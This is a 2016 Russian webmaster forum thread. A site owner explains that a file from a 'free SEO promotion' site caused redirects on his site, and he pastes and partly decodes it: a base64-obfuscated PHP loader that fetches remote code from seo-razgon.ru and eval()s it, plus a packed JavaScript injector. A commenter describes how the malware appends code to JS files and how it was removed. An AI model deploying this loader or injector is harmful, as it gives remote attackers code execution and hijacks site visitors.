Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » jQuery » Происходит редирект на сайте, что делать?

Происходит редирект на сайте, что делать?


     16.12.2016    jQuery, Ламерские вопросы    589

вопрос
Здравствуйте люди добрые, у меня проблема с редиректом, может поможете.
Я в поисках халявной раскрутки сайта, наткнулся на такой простенький сайтик seo-razgon.ru
Скачал файл, залил в корень сайта , и как дурак, запустил... В результате появился редирект на этот сайт епт.
Искал в .htaccess , он чист
Вот код того файла, который я скачал с сайта:
<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL3Nlby1yYXpnb24ucnUvd29yay50eHQ=');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($b);eval($d); ?>

Но он зашифрован, расшифровал
<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('http://seo-razgon.ru/work.txt=');$q=$_GET['q'];if($q)$b.=base64_decode('?q=').$q;$d=file_get_contents($b);eval($d); ?>

Дальше смотрим этот файл txt
header("Content-type: text/html; charset=UTF-8");echo base64_decode('PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPg0KICAgIDx0aXRsZT7Qn9CQ0J3QldCb0Kwg0KPQn9Cg0JDQktCb0JXQndCY0K8g0J/QoNCe0JPQntCd0JDQnNCYPC90aXRsZT4NCiAgICA8bGluayBocmVmPSJodHRwOi8vc2VvLXJhemdvbi5ydS9jc3MvcGFuZWwuY3NzIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiBtZWRpYT0ic2NyZWVuIiAvPg0KICAgIDxsaW5rIGhyZWY9Imh0dHA6Ly9zZW8tcmF6Z29uLnJ1L2ltZy9mYXZpY29uLmljbyIgcmVsPSJzaG9ydGN1dCBpY29uIiB0eXBlPSJpbWFnZS94LWljb24iIC8+DQo8L2hlYWQ+DQo8Ym9keSBvbmNvbnRleHRtZW51PSJyZXR1cm4gZmFsc2U7Ij4NCiAgICA8ZGl2IGlkPSJtYWluIj4NCiAgICAgICAgPGRpdiBpZD0ibmV3Ij48aDE+0J/QkNCd0JXQm9CsINCj0J/QoNCQ0JLQm9CV0J3QmNCvPC9oMT48L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibWVudSI+DQogICAgICAgICAgICA8YnV0dG9uIG9uY2xpY2s9ImdldF9kYXRhKCdjYXRhbG9nJykiPtCf0KDQntCT0J7QnSDQn9CeINCa0JDQotCQ0JvQntCT0JDQnDwvYnV0dG9uPg0KICAgICAgICAgICAgPGJ1dHRvbiBvbmNsaWNrPSJnZXRfZGF0YSgnc3ByJykiPtCg0JXQk9CY0KHQotCg0JDQptCY0K8g0JIg0KHQn9Cg0JDQktCe0KfQndCY0JrQkNClPC9idXR0b24+DQogICAgICAgICAgICA8ZGl2IGlkPSJyZXMiPtCk0LDQudC7INGD0YHRgtCw0L3QvtCy0LvQtdC9INC60L7RgNGA0LXQutGC0L3QvjwvZGl2Pg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibGlua3MiPjxhIGhyZWY9IiMiPtCi0KPQoiDQkdCj0JTQo9CiINCT0JXQndCV0KDQmNCg0J7QktCQ0KLQrNCh0K8g0J7QkdCg0JDQotCd0KvQlSDQodCh0KvQm9Ca0JgsINCV0KHQm9CYINCR0KPQlNCV0KIg0J3Qo9CW0J3QnjwvYT48L2Rpdj4NCiAgICA8L2Rpdj4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cDovL3Nlby1yYXpnb24ucnUvanMvcGFuZWwubWluLmpzIj48L3NjcmlwdD4NCjwvYm9keT4NCjwvaHRtbD4=');

Он тоже зашифрован, расшифруем:
header("Content-type: text/html; charset=UTF-8");echo base64_decode('<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ</title>
    <link href="http://seo-razgon.ru/css/panel.css" rel="stylesheet" type="text/css" media="screen" />
    <link href="http://seo-razgon.ru/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
</head>
<body oncontextmenu="return false;">
    <div id="main">
        <div id="new"><h1>ПАНЕЛЬ УПРАВЛЕНИЯ</h1></div>
        <div id="menu">
            <button onclick="get_data('catalog')">ПРОГОН ПО КАТАЛОГАМ</button>
            <button onclick="get_data('spr')">РЕГИСТРАЦИЯ В СПРАВОЧНИКАХ</button>
            <div id="res">Файл установлен корректно</div>
        </div>
        <div id="links"><a href="#">ТУТ БУДУТ ГЕНЕРИРОВАТЬСЯ ОБРАТНЫЕ ССЫЛКИ, ЕСЛИ БУДЕТ НУЖНО</a></div>
    </div>
    <script src="http://seo-razgon.ru/js/panel.min.js"></script>
</body>
</html>=');

Вроде бы обычная статистическая страница, но тут интересный ява-скрипт:
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b h(5){1 0=2.j(\'0\');k(0!=o){0.9.a(0)}1 3=2.c(\'d\');3.e=\'f://g-8.i/6/3.6?5=\'+5;1 7=2.l.m(3);7.n=\'0\'}1 4=p q();4.r(4.s()+t);2.u=\'v=w;x=/;y=\'+4;',35,35,'result|var|document|panel|D|vid|js|ap|razgon|parentNode|removeChild|function|createElement|script|src|http|seo|get_data|ru|getElementById|if|head|appendChild|id|undefined|new|Date|setDate|getDate|100|cookie|_y_m_|off|path|expires'.split('|'),0,{}))


У меня все ходы цепочки закончились, не знаю, куда дальше копать...
Проверил .htacess , он чист
Проверял сайт rescan.pro (прикреплена картинка)
Происходит редирект на сайте, что делать?

Ответа пока нет


4 комментария

progressive
Юзер

progressive - 16 декабря 2016 19:38 -

проверяйте все JS

krasov007
Юзер

krasov007 - 16 декабря 2016 20:52 -

а что примерно нужно искать?

krasov007
Юзер

krasov007 - 16 декабря 2016 20:53 -

***Комментарий удален***

sadykovs
Юзер

sadykovs - 10 января 2017 11:46 -

если еще актуально..на прсу описывается методика определения и удаления https://talk.pr-cy.ru/topic/21121-istoriya-kak-cataloguingru-ubil-moj-sajt/page-2...видно что авторы данного г-на все время развивают свое творение и в данном случае оно отрабатывает дописываем кода, который начинается
result|var|document|panel|D|vid|js|ap|razgon|parentNode|removeChild|function|createElement|script|src|http|seo|get_data|ru|getElementById|if|head|appendChild|id|undefined|new|Date|setDate|getDate|100|cookie|_y_m_|off|path|expires
в конец js файлов больше 3кб (у меня на сайте дописывал именно по этому условию)...вычищал все js скрипты ручками, так как параноидальные инструменты типа айболита ничего не находили, а сам редирект видел только через https://rescan.pro (вообще говоря владелец только через яндексметрику может узреть как сие г-но отрабатывает для посетителя)

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

наверх